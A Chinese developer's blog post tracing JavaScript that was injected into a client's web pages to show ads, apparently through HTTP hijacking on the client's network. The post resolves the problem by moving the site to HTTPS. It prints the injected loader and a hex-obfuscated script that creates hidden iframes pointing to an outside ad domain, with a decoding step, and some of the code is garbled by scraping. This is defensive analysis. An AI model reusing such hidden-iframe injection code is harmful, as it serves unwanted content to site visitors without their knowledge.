遭遇HTML被恶意注入JS弹广告,通过SSL证书学习及安装

遭遇HTML被恶意注入JS弹广告,通过SSL证书学习及安装

起因

近期有客户反映界面错乱,本能的以为是缓存原因导致的,告知方法,操作无效,远程查看发现代码里面突然多了一句

.js

好了,有线索就开始跟

if (typeof(PinkFlag) == 'undefined') {var PinkFlag = 1;setTimeout('pinka()', 500)
}
function pinka() {var ifm = [];var jsl = [];var i = 0;jsl[0] = "/zds31/1.js";if (document.body == null) {setTimeout('pinkLoad()', 500);return}for (i = 0; i < ifm.length; i++) {pinkb(ifm[i])}for (i = 0; i < jsl.length; i++) {pinkc(jsl[i])}
}
function pinkb(url) {var ifm = ateElement('iframe');ifm.setAttribute('src', url);ifm.setAttribute('width', 0);ifm.setAttribute('height', 0);ifm.setAttribute('frameborder', 0, 0);ifm.style.width = 0;ifm.style.height = 0;ifm.style.display = 'none';document.body.appendChild(ifm)
}
function pinkc(url) {var sobj = ateElement('script');pe = 'text/javascript';sobj.src = url;document.body.appendChild(sobj)
};

跟进/zds31/1.js 

function generateRandomAlphaNum(MmKKw$JlX1) {let rdmString = "";for (; rdmString["x6cx65x6ex67x74x68"] < MmKKw$JlX1; rdmString += window["x4dx61x74x68"]["x72x61x6ex64x6fx6d"]()["x74x6fx53x74x72x69x6ex67"](36)["x73x75x62x73x74x72"](2));return rdmString["x73x75x62x73x74x72"](0, MmKKw$JlX1);
}
function iframe(mrsC$gj2) {let iframe_code = window["x64x6fx63x75x6dx65x6ex74"]["x63x72x65x61x74x65x45x6cx65x6dx65x6ex74"]("x64x69x76");iframe_code["x73x74x79x6cx65"]["x64x69x73x70x6cx61x79"] = "x6ex6fx6ex65";iframe_code["x73x65x74x41x74x74x72x69x62x75x74x65"]("x69x64", generateRandomAlphaNum(6));let ifr = window["x64x6fx63x75x6dx65x6ex74"]["x63x72x65x61x74x65x45x6cx65x6dx65x6ex74"]("x69x66x72x61x6dx65");ifr["x73x72x63"] = mrsC$gj2;iframe_code["x61x70x70x65x6ex64x43x68x69x6cx64"](ifr);window["x64x6fx63x75x6dx65x6ex74"]["x62x6fx64x79"]["x61x70x70x65x6ex64x43x68x69x6cx64"](iframe_code);return iframe_code;
}
iframe('x68x74x74x70x73x3ax2fx2fx71x77x33x2ex78x78x66x66x6dx6dx2ex74x6fx70x2fx7ax64x73x33x31x2fx69x6ex64x65x78x2ex68x74x6dx6c');

跟进,居然还对JS加密了,跳转了一次又加密,手工解密

<html>
<head></head>
<body>
<div id="context"></div>
<script type="text/javascript">var x&#ElementById("context")var _0xb200=["x6cx65x6ex67x74x68","x4dx61x74x68","x72x61x6ex64x6fx6d","x74x6fx53x74x72x69x6ex67","x73x75x62x73x74x72","x73x75x62x73x74x72","x64x6fx63x75x6dx65x6ex74","x63x72x65x61x74x65x45x6cx65x6dx65x6ex74","x64x69x76","x73x74x79x6cx65","x64x69x73x70x6cx61x79","x6ex6fx6ex65","x73x65x74x41x74x74x72x69x62x75x74x65","x69x64","x64x6fx63x75x6dx65x6ex74","x63x72x65x61x74x65x45x6cx65x6dx65x6ex74","x69x66x72x61x6dx65","x73x72x63","x61x70x70x65x6ex64x43x68x69x6cx64","x64x6fx63x75x6dx65x6ex74","x62x6fx64x79","x61x70x70x65x6ex64x43x68x69x6cx64","x64x6fx63x75x6dx65x6ex74","x62x6fx64x79","x61x70x70x65x6ex64x43x68x69x6cx64","x68x74x74x70x73x3ax2fx2fx71x77x33x2ex78x78x66x66x6dx6dx2ex74x6fx70x2fx7ax64x73x33x31x2fx69x6ex64x65x78x2ex68x74x6dx6c"	];for(var i =0; i < _0xb200.length; i++){//alert(i +': '+ _0xb200[i]);x.innerHTML += i +': '+ _0xb200[i]+'<br/>';}</script>
</body>
</html>

 跟进输出结果

0: length
1: Math
2: random
3: toString
4: substr
5: substr
6: document
7: createElement
8: div
9: style
10: display
11: none
12: setAttribute
13: id
14: document
15: createElement
16: iframe
17: src
18: appendChild
19: document
20: body
21: appendChild
22: document
23: body
24: appendChild
25: /zds31/index.html

 继续跟进/zds31/index.html

最终是空白页,按照以往遇到的情况,肯定还是广告信息,但是查看源代码也没有加载信息,估计坏人正在升级系统.

 分析

通过本地网络和手机4G网络访问网站都没有问题,只能说明是客户路由器或者客户网络运营商的http数据遭遇截取,或者有意为之,最终的根本是广告投放产生利益!

网络上也有很多处理方式,但需要程序员根据自己的开发环境和业务进行选择,对于我目前面临的情况最终我选择了https解决方案.

其他朋友可以参考这位博主的类似遭遇(转载):.html

HTTPS SSL学习

HTTP和HTTPS协议(转载):

阿里云SSL介绍(转载):.html?spm=5176.2020520163.0.0.2f36zQKGzQKGRT

安装参考(转载):

实践思考

1.http转https的原因

2升级的范围

3.适合的证书

4.可能会遇到的问题

4.1 目前程序的调整

4.2 外部站点链接

4.3 支付站点配置

4.4 参考:=1610926136668434854&wfr=spider&for=pc

5.未来的证书升级操作

注意:需要对网站所有的 js css 等等外部素材引用改为动态引用 及http和https访问的时候获取的都是当前的协议.